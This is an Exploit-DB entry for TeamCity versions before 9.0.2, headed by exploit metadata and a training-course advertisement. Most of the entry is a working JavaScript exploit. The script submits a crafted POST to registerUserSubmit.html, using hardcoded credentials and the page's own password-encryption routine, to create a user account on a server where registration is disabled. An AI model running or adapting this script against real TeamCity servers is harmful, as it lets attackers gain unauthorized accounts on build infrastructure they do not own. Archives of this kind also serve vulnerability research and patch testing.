TeamCity < 9.0.2 - Disabled Registration Bypass

EDB-ID:

46514

CVE:

N/A


Author:

allyshka

Type:

remote


Platform:

Multiple

Date:

2018-03-28


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

var login = 'testuser'; //логин пользователя
var password = 'SuperMEgaPa$$'; //пароль
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
            onDuplicateAccountError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onMaxNumberOfUserAccountsReachedError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCreateUserError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCompleteSave: function(c, d, b) {
                BS.ErrorsAwareListener.onCompleteSave(c, d, b);
                if (!b) {
                    BS.XMLResponse.processRedirect(d);
                }
            }
        });
BS.ajaxRequest("registerUserSubmit.html", {
                method: "post",
                parameters: parameters,
                onComplete: function(i) {
                    if (!i.responseXML) {
                        alert(i.responseText);
                    } else {
                        var h = i.responseXML;
                        var e = BS.XMLResponse.processErrors(h, c);
                        console.log(i.responseText);
                        c.onCompleteSave(b, h, e, i.responseText);
                    }
                },
                onFailure: function(i) {
                    console.log(i);
                },
                onException: function(i, h) {
                    console.log(i);
                }
            });